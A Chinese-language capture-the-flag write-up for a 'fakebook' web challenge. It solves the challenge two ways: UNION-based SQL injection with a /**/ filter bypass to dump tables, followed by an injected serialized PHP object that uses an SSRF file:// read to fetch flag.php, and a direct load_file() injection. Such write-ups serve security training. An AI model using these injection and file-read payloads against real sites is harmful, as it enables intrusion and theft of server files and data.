解法一
在robots.txt
,可以发现/user.php.bak
下载下来是一段代码
<?phpclass UserInfo
{public $name = "";public $age = 0;public $blog = "";public function __construct($name, $age, $blog){$this->name = $name;$this->age = (int)$age;$this->blog = $blog;}function get($url){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output = curl_exec($ch);$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);if($httpCode == 404) {return 404;}curl_close($ch);return $output;}public function getBlogContents (){return $this->get($this->blog);}public function isValidBlog (){$blog = $this->blog;return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);}}
很明显是 SSRF的 , 但还不知道要咋用
注册一个账号登录进去 , 可以发现在url上存在一个参数可以进行传参
/view.php?no=1
先随便传点东西进去
估计存在sql注入啥的, 尝试进行测试
估计就是sql注入了, 需要绕过一些过滤
union select 不行, 但是单独的union 和 select 可以, 可能是不能连一起 , 中间用 /**/
可以正常回显
在测试的时候可以发现第二个参数可以回显
当前数据库: fakebook
得到表名:users
/view.php?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+
得到列名: no,username,passwd,data
/view.php?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook' and table_name='users'--+
得到数据 看着很糊, 但没有flag
/view.php?no=-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from fakebook.users--+
单独看 data 的数据
很明显的反序列化的内容 , 之前注册账号的内容
/view.php?no=-1 union/**/select 1,group_concat(data),3,4 from fakebook.users--+
这里就要跟前面得到的 代码有关了
利用SSRF的file协议读取本地文件
(前面给的序列化字符串, 猜测应该会进行一个反序列化)
<?php
class Userinfo
{public $name = "www";public $age = 15;public $blog = "file:///var/www/html/flag.php";
}
$data = new Userinfo();
echo serialize($data);
?no=-1 union/**/select 1,2,3,'O:8:"Userinfo":3:{s:4:"name";s:3:"www";s:3:"age";i:15;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
前面可以知道是data字段存放着序列化的字符串 , 所以将自己构造的序列化字符串放在第四个位置注入进去
源码里面可以找到一串特性的字符串, 点击一下, 就会跳转到相应的界面得到flag
解法二:
直接通过sql读取函数直接读取flag.php文件,借助load_file()函数
里面的参数是一个完整的路径,于是我们直接用var/www/html/flag.php路径去访问一下这个文件就可以拿的到flag
pyload:
?no=-1 union/**/select 1,load_file("/var/www/html/flag.php"),3,4--+